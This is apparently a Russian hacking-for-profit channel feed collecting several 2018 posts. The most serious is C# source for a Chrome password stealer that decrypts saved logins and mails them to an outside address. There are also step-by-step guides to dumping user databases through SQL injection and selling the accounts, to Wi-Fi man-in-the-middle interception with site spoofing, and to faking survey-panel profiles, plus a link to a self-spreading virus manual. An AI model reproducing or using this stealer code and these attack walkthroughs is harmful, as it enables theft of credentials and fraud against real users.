@money_hacker

Делаем самораспространяющийся вирус

2018-11-07T14:13:41.047Z

Скачать мануал: https://yadi.sk/i/2lRPKu3J3PQxUG

*****************************************************

Money Hacker - ПОДПИШИСЬ!

Как перехватывать трафик внутри Wi-Fi сети

2018-11-04T13:36:08.241Z

В этой статье рассмотрим бесплатное программное обеспечение для получения удаленного доступа в локальных системах. Цель этой статьи – показать какие последствия могут быть при использовании публичных WiFi сетей.

Intercepter

Intercepter – это многофункциональный сетевой инструмент, который позволяет получить данные из трафика (пароли, сообщения в мессенджерах, переписки и т.д.) и реализовать различные MiTM-атаки.

Основной функционал

Перехват сообщений мессенджеров.
Перехват кукис файлов и паролей.
Перехват активности (страницы, файлы, данные).
Возможность подмены скачивания файлов, добавляя вредоносные файлы. Можно использовать совместно с другими утилитами.
Подмена сертификатов Https на Http.

Режимы работы

Messengers Mode – позволяет проверять переписку, которая была отправлена в незашифрованном виде. Применялась для перехвата сообщений в таких мессенджерах ICQ, AIM, JABBER сообщений.

Ressurection Mode – восстановления полезных данных из трафика, из протоколов которые передают трафик в открытом виде. Когда жертва просматривает файлы, страницы, данные, можно частично или полностью их перехватывать. Дополнительно можно указать размер файлов, чтобы не загружать программу маленькими частями. Эту информацию можно использовать для анализа.

Password Mode – режим для работы с куки файлами. Таким образом, можно получить доступы к посещаемым файлам жертвы.

Scan mode – основной режим для тестирования. Для начала сканирования необходимо нажать правой кнопкой мыши Smart Scan. После сканирования в окне будут отображаться все участники сети, их операционная система и другие параметры.

Дополнительно в этом режиме можно просканировать порты. Необходимо воспользоваться функцией Scan Ports. Конечно для этого есть и намного функциональные утилиты, но наличие этой функции – важный момент.

Если в сети нас интересует целенаправленная атака, то после сканирования необходимо добавить целевой IP в Nat с помощью команды (Add to Nat). В другом окне можно будет провести другие атаки.

Nat Mode. Основной режим, который позволяет проводить ряд атак по ARP. Это основное окно, которое позволяет проводить целенаправленные атаки.

DHCP mode. Это режим, который позволяет поднять свой DHCP сервер для реализации атак DHCP по середине.

Некоторые виды атак, которые можно проводить

Подмена сайта

Для подмена сайта у жертвы необходимо перейти в Target, после этого необходимо указать сайт и его подмену. Таким образом можно подменить достаточно много сайтов. Все зависит от того, насколько качественный будет фейк.

В результате жертва открывает фейковый сайт при запросе vk.com. И в режиме паролей должен быть логин и пароль жертвы:

Расшифровка трафика

Чтобы провести целенаправленную атаку необходимо выбрать жертву из списку и добавить ее в таргет. Это можно сделать с помощью правой кнопкой мыши.

Теперь можно в режиме Ressurection Mode восстановить разные данные из трафика.

Подмена трафика

Далее необходимо указать в настройках несколько параметров:

После этого у жертвы будет меняться запрос "trust" на "loser".

Дополнительно можно убить кукис-файлы, чтобы жертва вышла со всех аккаунтов и повторно авторизовалась. Это позволит перехватить логины и пароли.

Как увидеть потенциального сниферра в сети с помощью Intercepter?

С помощью опции Promisc Detection можно обнаружить устройство, которое ведет сканирование в локальной сети. После сканирование в графе status будет «Sniffer». Это первый способ, которые позволяет определить сканирование в локальной сети.

Устройство SDR HackRF

SDR - это своеобразный радиоприемник, который позволяет работать с разными радиочастотными параметрами. Таким образом, можно перехватывать сигнал Wi-Fi, GSM, LTE и т.д.

HackRF - это полноценное SDR-устройство за 300 долларов. Автор проекта Майкл Оссман разрабатывает успешные устройства в этом направлении. Ранее был разработан и успешно реализован Bluetooth-снифер Ubertooth. HackRF успешный проект, который собрал более 600 тысяч на Kickstarter. Уже было реализовано 500 таких устройств для бета-тестирования.

HackRF работает в диапазоне частот от 30 МГц до 6 ГГц. Частота дискретизации составляет 20 МГц, что позволяет перехватывать сигналы Wi-FI и LTE сетей.

Как обезопасить себя на локальном уровне?

Для начала воспользуемся софтом SoftPerfect WiFi Guard. Есть портативная версия, которая занимает не более 4 мб. Она позволяет сканировать вашу сеть и отображать, какие устройства в ней отображены. В ней есть настройки, которые позволяют выбрать сетевую карту и максимальное количество сканируемых устройств. Дополнительно можно выставить интервал сканирования.

После сканирования программа присылает уведомления, сколько есть неизвестный устройств. Это позволяет нам добавлять и отмечать доверенных пользователей и заметить, если кто-то подключился и начинает прослушивать трафик. Уведомления будут приходить после каждого интервала сканирования. Это позволяет отключить определенного мошенника на уроне роутера, если есть подозрительные действия.

Заключение

Таким образом, мы рассмотрели на практике, как использовать программное обеспечение для перехвата данных внутри сети. Рассмотрели несколько конкретных атак, которые позволяют получить данные для входа, а также другую информацию. Дополнительно рассмотрели SoftPerfect WiFi Guard, которые позволяет на примитивном уровне защитить локальную сеть от прослушивания трафика.

*****************************************************

Money Hacker - ПОДПИШИСЬ!

Как взламывают криптовалютные биржи

2018-10-27T15:19:35.701Z

Прогремевший в конце января 2018 года взлом японской криптовалютной биржи Coicheck не только лишил пользователей токенов на сумму, эквивалентную более $500 млн, но и здорово пошатнул уверенность криптосообщества в степени киберзащиты подобных центров обмена.

В результате 5 марта японцы объединились против внешнего врага — организация, в которую войдут 16 лицензированных бирж, будет не только заниматься саморегулированием, но и противостоять атакам хакеров. Растущая популярность всего, обладающего приставкой «блокчейн» и пахнущего быстрыми деньгами, неизбежным образом привлекает к этой сфере мошенников.

Пока криптобиржи, разработчики и держатели электронных кошельков пренебрегают безопасностью, растет число сообщений об «ограблениях века» и многомиллионных хищениях с криптовалютных площадок. Чем промышляют криптобандиты, каков их набор средств и — самое главное! — что делать, чтобы не стать жертвой.

Как мухи на варенье

Согласно отчету Group-IB, одного из лидеров рынка по кибербезопасности, блокчейн-проекты остаются лакомым куском для тех, кто промышляет разного рода атаками и хищениями. В среднем один ICO проект подвергается атакам как минимум 100 раз. Международные криптовалютные площадки, где оборот средств в разы выше, становятся мишенями злоумышленников ничуть не реже. Только цифры и убытки, как правило, гораздо внушительнее.

Южнокорейская криптовалютная биржа Youbit подвергалась хакерским взломам в апреле и декабре 2017 года. Первый взлом привел к потере около 4000 биткоинов, второй лишил биржу 17% всех активов и привел к закрытию. NiceHash, площадка для покупки, продажи и аренды майнингового оборудования, была взломана в начале декабря 2017 года, общая сумма ущерба — $80 млн.

Популярную японскую криптобиржу Coincheck в конце января 2018 года навестили злоумышленники, которым удалось перевести на свои электронные кошельки 523 млн токенов криптовалюты NEM, стоивших на тот момент, примерно $534 млн. А были еще кейсы с биржами Bithumb, Mt. Gox — cписок можно продолжать, как говорят американцы, you name it.

«Количество атак на криптовалютные биржи резко возросло как раз в тот момент, когда сами цифровые валюты начали расти в цене. В декабре 2017 года стоимость Bitcoin достигла $20 000, что не могло не привлечь внимание киберпреступников, — отмечает генеральный директор компании SEC Consult Services Георгий Лагода. — При этом уровень защиты этих площадок против кибератак оказался недостаточно высоким, чтобы предотвратить миллионные потери».

Ловись, биржа, большая и маленькая

В чем уязвимость блокчейна при кибератаке? Во-первых, разработчики неверным образом зачастую полагают, что слова «крипто» и «блокчейн» означают безопасность по умолчанию.

«Должное внимание не уделяется ни качеству кода, ни сетевой архитектуре, — замечает Георгий Лагода, — а ведь они могут быть уязвимы. Отдельного внимания заслуживает безопасность смарт-контрактов. И здесь зачастую полагаются на безопасность структуры блокчейна, упуская из виду небезопасное использование генераторов псевдослучайных чисел, используя данные из основной сети Bitcoin или аналогичных валют в качестве источника случайной величины».

В феврале специалисты подсчитали, что из миллиона смарт-контрактов Ethereum уязвимостями обладают более 34 000. Исследователи из Университетского Колледжа Лондона проверили свои предположения на 3000 смарт-контрактах блокчейна Ethereum. 89% из них оказались носителями тех или иных багов, что теоретически позволило бы украсть эфиров на сумму $6 млн.

Самыми популярными атаками на сегодняшний день являются атаки типа DDoS и фишинг.

В целом, аббревиатура DDoS (Distributed Denial of Service — распределенный отказ в обслуживании) уже давно украшает сводки новостей и вызывает трепет пользователей. При такой атаке хакеры направляют на сервер искусственно созданный трафик, имеющий несколько источников, чтобы создать для сервера непосильную нагрузку, и «кладут» его.

В этом случае биржи также теряют деньги, ведь при отсутствии доступа, особенно длительного, пользователи биржи не могут использовать ее функции, и капитал не движется. Криптовалютная биржа Bitfinex в декабре 2017 года подверглась мощнейшей атаке такого рода.

Фишинг (phishing) — мошенничество, основанное на принципах социальной инженерии. Сначала создается практически точная копия сайта, например, выбранной злоумышленниками биржи. Затем при помощи спам-технологий рассылается письмо, составленное таким образом, чтобы быть максимально похожим на настоящее письмо от биржи.

Почти в точности повторяются логотипы, имена и фамилии реальных руководителей. Сообщается о том, что из-за смены программного обеспечения или — вот ирония! — из-за нападения хакеров пользователю необходимо подтвердить или изменить свои учетные данные. Во всех случаях цель таких писем одна — заставить пользователя нажать на приведенную ссылку, а затем ввести свои конфиденциальные данные на ложном сайте.

Пользователи популярной криптовалютной биржи Binance несколько недель назад стали жертвами таких трюкачей, причем отличить настоящий сайт от фейка невооруженным глазом было почти невозможно.

Поэтому красной линией любых списков рекомендаций от экспертов всегда проходит заклинание: не хранить значительные средства на биржах и использовать эти площадки только для сделок.

«Атаки на ICO — те вообще происходят постоянно, — утверждает Евгений Юртаев, директор финтех-компании Zerion, производителя программного обеспечения. — Один из самых частых примеров — спуфинг, когда злоумышленники получают доступ к DNS сайта и перенаправляют его на несуществующий домен. От такой атаки пострадала, например, Enigma, когда на поддельном сайте выставили адрес, куда надо было отправлять эфиры, и было украдено больше $500 000. Общей рекомендацией остается не хранить крупные суммы денег на централизованных биржах и по возможности использовать децентрализованные альтернативы, которые набирают ликвидность».

Щит, меч и регистрация

Что делать? Существует способ приблизить размер рисков к нулю: проведение внутренних и внешних аудитов информационной безопасности, постоянный мониторинг активности пользователей и использование рекомендованных экспертами решений. Существует, например, чаще других используемый аудиторами международный стандарт CobiT (Control Objectives for Information and related Technology).

Одна из основ блокчейна — использование смарт-контракта. Его всесторонний аудит также нужно проводить в обязательном порядке. Отличие от «обычной» защиты информации в критичности системы и объеме денег, который постоянно крутится в проекте, а также в своей логике работы системы.

Чтобы защитить своих пользователей, бирже нужно прежде всего защитить себя. Самым распрост��аненным решением является использование двухфакторной аутентификации (2FA) и «холодных» серверов.

Некоторые биржи идут дальше и просят пользователей предоставить копии документов. Например, на Bittrex требуется верификация аккаунта с указанием персональных данных для вывода цифровой валюты общим объемом до 3 биткоинов в день.

При выводе до 100 биткоинов в день — с предоставлением копии удостоверения личности. Кроме того, основная часть всех цифровых активов биржи хранится офлайн на «холодных», то есть физически не подключенных ни к какому компьютеру, носителям и выводится онлайн только при совершении транзакций.

Также существуют процедуры AML (Anti Money Laundering — борьба с отмыванием денег) и КУС (Know Your Client — знай своего клиента), которые биржи объявляют обязательными.

Ключ от квартиры, где деньги лежат

Говорят, что существует три вида лжи: ложь во благо, отъявленная ложь и статистика. Так вот, статистика говорит, что на 1000 строк исходного кода в среднем насчитывается 1 ошибка. И нет никакой уверенности, что именно этот баг не будет связан с безопасностью.

Как утверждают эксперты по кибербезопасности, даже если разработчики биржи напишут идеальный код, всегда остается риск, что в сторонних проектах, которые им приходится использовать, будут уязвимости.

«Поскольку любая биржа, и не только криптовалютная, это «про деньги», отдельное место в общем спектре атак играют атаки, основанные на социальной инженерии. А также, как ни удивительно, случайные события, причиной которых служат обычная человеческая глупость и невнимательность. Рядовые пользователи — часто большие любители слабых паролей, потерянных «холодных» кошельков, использования «горячих» кошельков и публичного Wi-Fi для доступа к большому объему средств, перехода по подозрительным ссылкам», — описывает распространенные ошибки Георгий Лагода.

В конечном итоге пользователь или площадка, у которых украли средства тем или иным способом, вынуждены рассчитывать лишь на честность хакеров, так как в отличие от традиционной финансовой среды алгоритмы возмещения утраченных средств в криптосфере не отработаны. Если хакеры взломают ваш банковский счет и уведут с него значительную сумму денег, то банк может отследить и аннулировать криминальные транзакции, возместив ущерб.

Компенсация украденной криптовалюты проблематична или просто невозможна по технологическим причинам и в силу анонимности транзакций. Тем более любопытно выглядит история неизвестного Робина Гуда хакерского происхождения, который по неизвестной причине вернул $26 млн в токенах Ethereum в лоно ограбленной им в прошлом году биржи CoinDash. Рассчитывать на подобный альтруизм в большинстве случаев не приходится.

Поэтому стоит помнить:

во-первых, и у хайпа есть цена;
во-вторых, безопасность, как всегда, превыше всего.

*****************************************************

Money Hacker - ПОДПИШИСЬ!

Добыча аккаунтов. Заработок на дампе.

2018-09-07T14:37:14.753Z

Статья написана для новичков.

"Как дампить?" или "Где брать аккаунты?". Так вот сегодня мы и будем добывать аккаунты и получать с них профит.

Что нам потребуется:

Мозги и ровные руки.
Дорки.
Прокси желательно приватные, но можно и паблик.
Для лучшего результата приват софт.

Я не буду описывать создание дорок, есть достаточно статей и способов для этого.

Итак приступим:

Открываем Searcher нажимаем "Sourse" и выбираем наши дорки.
Нажимаем "Proxy" и загружаем прокси.
Настраиваем прокси как на картинке:

Жмем "Start" и ждем конца парсинга (ну или пока не надоест).
Открываем SQLi Dumper и импортируем наши ссылки:

Переходим в следующую вкладку и жмем "Start Exploiter" ждем окончания проверки.
Во вкладке "Injectables" выставляем галочки как на скриншоте и жмем "Start Analyzer":

После того как дождались конца выделяем все ссылки и жмем Search Columns\ Tables Names, пишем то что будем искать к примеру:

Жмем "Start", ищем одинаковое число в скобках:

Выбираем одну из них и жмем "Go To Dumper", "Dumper form".

Выбираем нужную колонку в нашем случае user и жмем "Get Columns".

Ставим галочки на колонках которые нам нужны и жмем "Get Data" после слития базы экспортируем в документ.

И так мы слили базу но чаще всего она в зашифрованном виде, чтобы что то получить с неё её нужно расшифровать.

По расшифровке написано довольно много статей гуглите.

Допустим мы получили email:password, что делать дальше? Желательно прогнать базу антипабликом и сохранить приват. Дальше есть много способов получения профита с этого:

Найти скупщиков баз.
Набираете у людей запросы которые им нужны и чекаете на валид, в случае успеха продаем запросы.
Чекаем на невалид запросы (origin, uplay и т. д.) и продаем аккаунты скупщикам или знакомым.

С первым пунктом все понятно.

Второй пункт тоже набираете прокси, берете кряк AIO или Amfi и идете чекать(забугор не обязательно чекать с прокси но лучше с ними).

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Воруем пароли из Google Chrome

2018-09-05T15:59:07.440Z

Задача: Написать свой стиллер, который будет расшифровывать пароли GoogleChrome и отсылать на почту.

Для начала поговорим о DPAPI(Data Protection Application Programming Interface) – Майкрософт, как и многие компании столкнулась с проблемой шифрования данных, которые могут быть расшифрованы только на стороне клиента. В итоге был создан алгоритм на основе мастер – ключа.

Мастер – ключ - это комбинация следующих элементов:

SID — уникальный идентификатор безопасности.

HMAC (сокращение от англ. hash-based message authentication code, хеш-код идентификации сообщений).

PBKDF2 – Password-Based Key Derivation Function. Стандарт формирования ключа на основе пароля. Использует псевдослучайную функцию для получения ключей.

MasterKey BLOB — это как раз данные с зашифрованным ключом.

Подробнее почитать тут https://habrahabr.ru/post/148602/

Отсюда следует главный вывод, что расшифровать пароли хрома можно только там где они были созданы.

Давайте напишем такой стиллер.

Установим SQLLITE уже известным нам менеджером установки пакетов и добавим следующий код:

string fileDb = @"C:/Users/Adminka/AppData/Local/Google/Chrome/User Data/Default/Login Data"; // Путь к логин данным

string connectionString = $"Data Source = {fileDb}";

string fileName = @"C:/Temp/output.txt"; // Выходной файл с паролями

StreamWriter sw = new StreamWriter(fileName, false, Encoding.UTF8);

string dbWay = "Login Data";

string db_fields = "logins"; // база паролей SQLITE

byte[] entropy = null;

string description;

DataTable db = new DataTable();

string sql = $"SELECT * FROM {db_fields}";

using (SQLiteConnection connection = new SQLiteConnection(connectionString))

{

SQLiteCommand command = new SQLiteCommand(sql, connection);

SQLiteDataAdapter adapter = new SQLiteDataAdapter(command);

adapter.Fill(db);

}

int rows = db.Rows.Count;

Console.WriteLine($"Всего записей: {rows}");

for (int i = 0; i < rows; i++)

{

string url = db.Rows[1].ToString();

string login = db.Rows[3].ToString();

byte[] byteArray = (byte[])db.Rows[5];

byte[] decrypted = DPAPI.Decrypt(byteArray, entropy, out description);

string password = new UTF8Encoding(true).GetString(decrypted);

sw.WriteLine("----------------------------");

sw.WriteLine($"Номер: {i}");

sw.WriteLine($"Сайт: {url}");

sw.WriteLine($"Логин: {login}");

sw.WriteLine($"Пароль: {password}");

}

sw.Close();

MailSend.SendMail("smtp.mail.ru", "YourEmail@mail.ru", "password", "YandexMail3@ya.ru", "Пароли", fileName, fileName);

Console.ReadKey();

Код класса DPAPI Взят отсюда http://www.obviex.com/samples/dpapi.aspx

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Как создать свое первое мобильное приложение

2018-09-03T14:12:42.588Z

Идея

Работа над созданием приложения начинается с идеи. Для начала подумайте для кого вы хотите сделать приложение. Например, если вы живете в большом городе, где много туристов, то можно подумать о создании приложения для них. Вариантов очень много.

Кроме того, подумайте о своих увлечениях и интересах. Допустим, вы часто путешествуете и хотите посетить самые знаменитые клубы по всему миру. Вы составили список ваших любимых мест. Почему бы не превратить эту базу данных в приложение для путешественников?

Много известных приложений не сосредоточены вокруг особых интересов, но они всегда в первых тройках рейтингов – это игры. Вы, наверное, уже загрузили в свой смартфон – Temple Run, Minecraft. Игровые приложения имеют тенденцию зарабатывать больше денег, поскольку пользователи охотнее готовы платить за них, особенно если они очень популярны среди ваших друзей.

Не отчаивайтесь, если вы найдете что-то похожее на вашу идею при поиске через App Store. Научитесь мыслить нестандартно. Например, есть несколько приложений, которые предоставляют информацию и карты обо всех самых популярных туристических местах в Москве. Но есть приложение, которое предоставляет информацию о необычных местах города, о которых не все знают.

Попробуйте придумать идею, у которой будет мало конкурентов. Но если вы решительно настроены в воплощении вашей идеи в приложение, несмотря на конкуренцию, взгляните на ваших конкурентов и попытайтесь выяснить, что вы можете сделать, чтобы ваше приложение было лучше их.

Вот некоторые важные моменты, которые необходимо учитывать пока вы размышляете над вашим приложением:

Планируете ли вы разрабатывать приложение самостоятельно, или вы в состоянии нанять команду программистов?
Чем приложение будет полезно людям
Потребует ли приложение ежедневного контроля
Вы хотите, чтобы ваше приложение стало вашим основным бизнесом или просто одиночным проектом
На каких платформах будет работать ваше приложение

Типы приложений

Есть очень много категорий, в которых можно создать приложение. Вот список с примерами некоторых наиболее популярных вариантов.

Игры (Angry Birds)
Путешествия (TripAdvisor, Kayak)
Социальные сети (Facebook, Twitter)
Новости (РИА Новости, НТВ: новости )
Музыка (Spotify, Pandora)
Видео (Vine)
Утилиты (Google Переводчик, фонарик)
Фото (Instagram, Picstitch)

Варианты монетизации

Перед началом разработки приложения вам нужно определиться, как вы будите на нем зарабатывать. Существует несколько основных способов монетизации приложений:

Бесплатное приложение. Обычно используется крупными компаниями, и приложение помогает продавать их товары или услуги.
Бесплатное приложение с рекламой. Используется в популярных приложениях, активно взаимодействующих с пользователем
Платное приложение. Самый популярный и доходный вид монетизации. С каждой продажи вашего приложения Apple берет комиссию в размере 30%.
Lite и Pro. Lite приложение бесплатно, но с ограниченным набором функций. Покупая Pro вы разблокируете весь функционал
Покупки внутри приложения — вы можете продавать новый функционал или новые уровни игры прямо из приложения

Разработка

Теперь у вас есть идея. Здорово, это уже полдела! Но что теперь? Мы предполагаем, что у вас, как и большинства людей, нет никакого опыта в программировании. И это прекрасно! Есть куча вариантов.

Если вы хотите пойти по легкому, но более дорогому пути, то загляните на сайты разработчиков мобильных приложений. Сайт AppBooker позволяет ввести нужную платформу, страну, ваш бюджет и затем он выдаст список разработчиков, которые отвечают вашим потребностям. Выбрав разработчика, вы можете увидеть список его клиентов и типы приложений, на которых они специализируются.

Хороший список отечественных разработчиков можно посмотреть здесь – ratingruneta.

Еще один вариант найти разработчика это обратиться на биржи флинасеров. Возможно, это даже будет дешевле, но более рискованно, так как вам может попасться недобросовестный работник.

Вот несколько вопросов, которые стоит задать вашему будущему разработчику:

Стоимость их работы?

На кого они работали в прошлом?

Являются ли их приложения успешными?

Буду ли я обладать всеми правами на приложение?

Есть ли у них опыт и знания, чтобы воплотить вашу идею в жизнь?

Под какие платформы (IOS, Android и т.д.), они могут создавать приложения?

Стоимость разработки

Как говорится, чтобы заработать деньги надо их сначала потратить. Это не совсем так если говорить о мобильных приложениях, но вернемся к этому ниже. А пока предположим, что вы решили заказать приложение у разработчика.

В зависимости от типа приложения, которое вы хотите сделать, цена может варьироваться от $500 до $100000. Такая цена может показаться очень высокой, но стоит иметь в виду, что прибыль от успешного приложения покрывает расходы в несколько раз. Кроме того, игровые приложения самые дорогостоящие в плане разработки, так же являются хитами продаж.

Если у вас уже есть некоторые наработки (например, макет и графика), вы можете значительно уменьшить цену. Еще один способ, снизить расход, предложить разработчику часть прибыли от приложения.

Чтобы приблизительно узнать, сколько будет стоить разработать приложение можно воспользоваться калькулятором howmuchtomakeanapp. Его создала канадская компания ooomf.com. Полученную цену можно смело делить на 2, и вы узнаете цену разработки у нас. Можно посмотреть также примеры уже созданных ими приложений с ценами – crew.co.

Размещение уже готового приложения на App store обойдется вам $99.9 в год. Размещение приложения на Android Market стоит $25.

Как создать приложение бесплатно

Если вы не хотите создать игру или какое-то уникальное по своим функциям приложение, то вы вполне можете воспользоваться специальными онлайн конструкторами мобильных приложений. С помощью этих сайтов вы можете бесплатно сделать простенькое приложение без знаний в программировании. Но если вы захотите чего то особенного, то вам придётся перейти на платный тариф.

Appsmakerstore.com
Infinitemonkeys.mobi
ibuildapp.com
appsvolcano.com
yapp.us

Сколько можно заработать?

Очевидно, что деньги, которые вы заработаете на своем приложении, во многом будет зависеть от его популярности, и сколько вы заработаете трудно сказать.

Исследование, проведенное в GigaOM Pro показало, что более половины их 352 опрошенных разработчиков зарабатывают менее $500 в месяц.

Этого конечно недостаточно чтобы жить только от доходов с приложения, но прекрасно, если вы просто хотите заработать немного дополнительных денег.

Конечно, вы можете сделать еще один хит на подобии Angry Birds, которые будут зарабатывать для вас $100 000 в месяц!

Для того чтобы хорошо зарабатывать на своем приложении, прочтите несколько советов:

ваше приложение должно быть интересно широкой аудитории
исследуйте самые популярные приложения на рынке
в настоящее время, легче заработать деньги на приложениях для IOS
сделайте ваше приложение доступным для Ipad

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Немного годноты для Google Chrome

2018-08-31T15:41:04.548Z

1. EditThisCookie

EditThisCookie - это менеджер cookie. Вы можете добавлять, удалять, изменять, искать, защищать и блокировать cookie, продлить срок и т.д.

2. Visual Event

Visual Event - удобный парсер JavaScript кода, с приятным интерфейсом. Тоесть для того что-бы узнать какая функция вызывается при нажатии ( onclick ), достаточно включить расширение.

3. Web Sniffer

Web Sniffer - сниффер запросов. Допустим вам нужно узнать куда отправляются данные при авторизации, и каким методом они передаются.

4. User-Agent Switcher

User-Agent Switcher - подделка информации о браузере, при посещении. При посещении любого ресурса, передается такая информация как:

-ip

-user-agent (расширеная информация о браузере)

-включен ли Javascript/webGL

-время установленое на компьютере

-временая зона

и еще много чего...

С помощью расширения можно отредактировать информацию о браузере, при посещении ресурса.

Проверить свой User-agent можно тут:

www.whoishostingthis.com/tools/user-agent/

5 - Toggle JavaScript

Toggle JavaScript - позваляет мгновенно отключать и включать javascript. Как многим известно js штука не без обидная, она способна отправить запрос от вашего ip адреса, если вы посетите какой-нибудь сайт с вредоносным js скриптом. Расширение позволяет отключить js и просматривать страницы без него. Интерфейс легкий, нажал один раз - отключил js, еще один раз включил. Внешний вид и функционал привычных вам сайтов, может значительно измениться.

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Прохождение платных опросов. 500р/день.

2018-08-29T16:04:13.644Z

Привет друзья, вы наверняка слышали о таких сервисах как платные опросники, но не знаете как ПРАВИЛЬНО на них заработать?

Эта статья специально для вас!

За что Вам будут платить?

Первый бонус дают за заполнение анкеты.

Получайте награду от 15 - 500 рублей за прохождение опроса.

Приглашайте друзей и получайте 10% от их дохода.

Награды за качественные вопросы.

Помогайте людям ответами и получайте вознаграждение.

Чем больше опросов проходишь, тем больше получаешь

Так что можете смело приступать, еще один отличный вариант заработка в интернете.

Вообще, сайтов, позволяющих зарабатывать таким образов в интернете очень много. Если зарегистрироваться на самых популярных, и немного привыкнуть ко всем этим анкетам, то заработок будет довольно неплохой и быстрый, так как после 20-го (10-го или 50-го, тут индивидуально) пройденного опроса, вы уже будете на автомате отвечать на вопросы, так как в большинстве опросов они одинаковые и понять то, о чём вас спрашивают, можно будет прочитав первое и последнее слово вопроса!) Я лишь хочу поделиться с вами списком самых популярных опросников и парочкой советов для новичков (и не только). Поехали:

Список лучших опросников:

Myiyo
Платный Опрос
Экспертное мнение
Вопросник
Profi Online Research
e-opros
Анкетка
InternetOpros
i-Say
Anketolog
MarketAgent
МоеМнение
RUBLKLUB
ИнтернетАнкетка
Точка Зрения
АвтоОпрос

Так же в интернете можно найти еще десяток сайтов, но платить больше, или даже на одном уровне с теми, что я перечислил выше, они не будут. Та и не факт, что вообще будут платить! Поэтому, будьте осторожны.

Теперь перейдем к тем самым простым, но полезным советам:

1. Очень часто вводная часть опроса содержит один принципиальный вопрос – работаете ли вы или ваши родственники в:

• СМИ или PR;

• сфере образования;

• маркетинге…

Даже если и работают, лучше в этом не признаваться. Как правило, представители этих сфер деятельности ни в один платный опрос не входят. Проверять никто не станет, но даже не смотря на это по ключевым вопросам лучше не врать. Если, например, при заполнении профиля вы указали, что замужем и имеете ребенка, не отмечайте во время опроса, что вы неженатый и двадцати лет от роду. Система помнит всё, что вы ей отвечали с первого дня вашего знакомства. Поэтому, если вы будете заподозрены в нечестности, запросто можете быть вычеркнуты из кандидатов на следующий платный опрос в интернете или вообще забанены.

2. Но есть и вещи, которые можно немного приукрасить. Например, стать немного:

• платежеспособней (собираетесь покупать?.. — Конечно! Может, даже два!)

• самостоятельней (все решения принимаю сам! Нет, с женой не советуюсь!)

• ненасытней (подумаешь, есть два смартфона, утюга, телевизора, холодильника...Третий ведь такой няшный!.. Куплю и в самое ближайшее время!). Не бойтесь, чек для подтверждения прислать не потребуют.

3. Не ждите опросы на почте! Иногда, оповещение запаздывают, а о некоторых опросах и вообще не приходят. Есть возможность зайти на опросники? Заходите, проверяйте — это вам же на пользу!

Не поленитесь зарегистрироваться везде, хоть это долго и нудно. Ведь это в дальнейшем может приносить вам довольно неплохой ежедневный доход!

Лайфхак

Заработок от 500 рублей в день и более.

Постараюсь коротко и максимально понятно:

Идеально подходит,если ты просиживаешь штаны дома и ничего не делаешь, подходит для новичков.

Будем наживаться на сайтах которые проводят опросы, сейчас подумаешь что они платят копейки и т.д. Но нет дружище, тут главное правильно все сделать, в начале придется набраться терпения и потрудиться.

Ищите все возможные сайты опросники(вышеназвания сайтов написал. уже считай нашли)

Дальше сам процесс регистрации, тут читай внимательно. Нам нужно создать образ человека который потребляет максимально кол-во товаров любого вида, как это делается.

Вам должно быть порядка 30 - 45 лет, у вас 2-3 ребенка, жена, хорошая работа, живёте вы в БОЛЬШОМ ГОРОДЕ - Москва (Это очень важно). У вас несколько машин, хороший дом, дети разной возрастной категории ( 2 года, 7 лет, 15 лет - лучший вариант ), работа не пыльная - ТОЛЬКО НЕ МАРКЕТИНГ, что угодно (У меня прокатывала Медицина), машины не дешевые (500000 - 1500000 рублей) такая же и вторая. У вас все возможны технологии (Телефоны, компьютеры, и вся-вся эта хрень) Вы главный в семье и решаете все финансовые потребности.

И так это САМОЕ ГЛАВНОЕ. Делайте так что бы быть максимально потребляющим человеком. Все данные которые пишите при регистрации или запоминайте или сохраняйте (Сохранять лучше), Имя Фамилия Отчество адекватные, можно свои, можно выдумать, ничего там не проверяется. Почта должна быть gmail, так как на другие почты опросы часто не приходят.

Всё это проделываем везде, рука набьется и за день везде можно зарегаться.

С такими данными за один опрос будут платить порядка 30-100 рублей, зависит от вашей активности, то есть уже не 5 копеек, а 100 рублей. Через неделю полной активности ждите тучу этих опросов с разных сайтов. Я максимально поднимал при хиленькой вечерней активности, по 4-5 опросов за вечер порядка 20-30 тыс. в месяц.

Удачи и пока!

*********************************************************

Money Hacker - ПОДПИШИСЬ!

Большой обзор программ для взлома Wi-Fi

2018-08-27T13:18:41.922Z

В наше время беспроводные сети используются буквально повсюду. Это быстро, удобно, надежно, не требует размещать множество кабелей по дому и дает свободу передвижения при использовании устройства. Технология Wifi разрабатывалась как безопасная сеть, к которой могут получить доступ только те участники, у которых есть пароль. Но со временем люди находили уязвимости в самом протоколе и в его реализациях, из-за чего сети становились небезопасными.

Соответственно, выпускались новые версии протокола, закрывающие старые проблемы. Так сначала появился алгоритм шифрования WEP, затем WPA и WPA2. Последний является самым надежным на данный момент. Но за это время было создано множество инструментов для тестирования безопасности Wifi и взлома. Если вы хотите быть уверенными что ваша сеть в безопасности, вам лучше знать чем могут пользоваться злоумышленники для атаки на нее. В этой статье мы собрали самые популярные программы для взлома Wifi.

ПРОГРАММЫ ДЛЯ ВЗЛОМА WI FI

1. AIRCRACK

Первый в нашем списке — Aircrack или Aircrack-ng. Это лучшая программа для взлома wi fi и самый популярный инструмент для тестирования безопасности беспроводных сетей. По сути, это набор инструментов, которые могут практически все, но работают только из командной строки. Каждый инструмент из набора выполняет четко одну свою функцию. Вот основные из функций — поиск доступных сетей и просмотр подробной информации о них (airodump), захват сетевых пакетов и их фильтрация (airodump), настройка сетевого интерфейса для работы в режиме монитора (airmon), отправка пакетов в сеть (aireplay), перебор паролей с помощью алгоритмов или словаря (aircrack), расшифровка трафика (airdecap).

Принцип действия довольно прост, сначала злоумышленник должен переключить карту в режим монитора, затем найти вашу сеть и начать собирать с нее пакеты или другие данные. Как только он получит то что ему нужно, перейдет к перебору пароля. В случае c WEP будет достаточно только большого количества пакетов и пароль будет найден с вероятностью 100%. Для WPA нужно перехватить рукопожатие, которое передается в момент, когда вы подключаетесь к сети. А дальше его можно перебирать по словарю. Чем проще пароль тем быстрее он будет перебран. Программа кроссплатформенная и может работать в Windows и в Linux.

2. AIRSNORT

